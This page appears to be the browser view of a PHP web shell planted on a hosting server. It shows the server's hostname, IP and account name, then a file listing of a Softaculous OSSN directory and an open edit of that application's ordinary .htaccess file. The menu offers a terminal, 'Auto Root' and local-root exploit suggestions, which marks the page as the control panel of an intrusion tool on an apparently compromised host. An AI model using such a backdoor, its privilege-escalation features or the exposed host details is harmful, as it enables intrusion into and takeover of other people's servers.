Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.216.17
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
ossn /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-07-29 15:52
php53
[ DIR ]
drwxr-xr-x
2026-07-29 15:52
php56
[ DIR ]
drwxr-xr-x
2026-07-29 15:52
php71
[ DIR ]
drwxr-xr-x
2026-07-29 15:52
php81
[ DIR ]
drwxr-xr-x
2026-07-29 15:52
php82
[ DIR ]
drwxr-xr-x
2026-07-29 15:52
.htaccess
2.11
KB
-rw-r--r--
2026-06-01 03:58
.user.ini
330
B
-rw-r--r--
2022-06-20 06:14
_index.php
59
B
-rw-r--r--
2021-12-23 04:54
changelog.txt
2.17
KB
-rw-r--r--
2026-07-28 00:50
clone.php
4.5
KB
-rw-r--r--
2026-07-28 06:26
data.zip
254.47
KB
-rw-r--r--
2026-07-28 00:50
edit.php
4.53
KB
-rw-r--r--
2026-07-28 06:26
edit.xml
433
B
-rw-r--r--
2025-12-31 04:59
extend.php
8.3
KB
-rw-r--r--
2026-07-28 06:26
fileindex.php
346
B
-rw-r--r--
2022-11-28 06:12
import.php
3.04
KB
-rw-r--r--
2026-07-28 06:26
info.xml
3.3
KB
-rw-r--r--
2026-07-28 00:50
install.js
924
B
-rw-r--r--
2021-12-23 04:54
install.php
12.18
KB
-rw-r--r--
2026-07-28 06:26
install.xml
1.33
KB
-rw-r--r--
2021-12-23 04:54
md5
2.5
KB
-rw-r--r--
2026-07-28 06:26
notes.txt
578
B
-rw-r--r--
2025-01-30 02:24
ossn.zip
4.31
MB
-rw-r--r--
2026-07-28 00:50
soft.htaccess
127
B
-rw-r--r--
2021-12-23 04:54
update_pass.php
508
B
-rw-r--r--
2025-10-06 00:57
upgrade.php
4.85
KB
-rw-r--r--
2026-07-28 06:26
upgrade.xml
382
B
-rw-r--r--
2021-12-23 04:54
Save
Rename
# v9.1.0.0 # Open Source Social Network # # @package .htaccess.ossn # @author OSSN Core Team <info@opensource-socialnetwork.org> # @copyright (c) Engr. Syed Arsalan Hussain Shah (OpenTeknik LLC) # @license OPEN SOURCE SOCIAL NETWORK LICENSE https://opensource-socialnetwork.org/licence # @link https://www.opensource-socialnetwork.org Options -Indexes Options +SymlinksIfOwnerMatch DirectoryIndex index.php <Files "error_log"> order allow,deny deny from all </Files> <Files ".user.ini"> order allow,deny deny from all </Files> <FilesMatch "(nginx|htaccess).dist"> order allow,deny deny from all </FilesMatch> #Disallow CLI and CRON script and other from browser RedirectMatch 404 ^/system/handlers/cli$ RedirectMatch 404 ^/system/handlers/cron$ RedirectMatch 404 ^/upgrade/upgrades/ RedirectMatch 404 /actions/ RedirectMatch 404 /libraries/ RedirectMatch 404 /classes/ RedirectMatch 404 /plugins/default/ <IfModule mod_mime.c> AddType image/vnd.microsoft.icon .ico </IfModule> <IfModule mod_expires.c> ExpiresActive On ExpiresDefault "access plus 1 year" </IfModule> <FilesMatch "\.(jpg|jpeg|gif|png|mp3|flv|mov|avi|3pg|html|htm|swf|js|css|ico)$"> FileETag MTime Size </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine on RewriteRule ^rewrite.php$ installation/tests/apache_rewrite.php [L] RewriteRule ^action/([A-Za-z0-9\_\-\/]+)$ system/handlers/actions.php?action=$1&%{QUERY_STRING} [L] RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([A-Za-z0-9\_\-\.]+)$ index.php?h=$1 [QSA,L] RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([A-Za-z0-9\_\-\.]+)/(.*)$ index.php?h=$1&p=$2 [QSA,L] </IfModule> <IfModule mod_headers.c> <FilesMatch "\.(jpg|jpeg|png|gif|webp|svg)$"> Header set Access-Control-Allow-Origin "*" </FilesMatch> </IfModule> #https://github.com/nextcloud/server/issues/26569 <IfModule mod_php.c> php_value memory_limit 512M php_value register_globals 0 php_value post_max_size 105M php_value upload_max_filesize 100M php_value default_charset "UTF-8" php_flag session.cookie_httponly on </IfModule>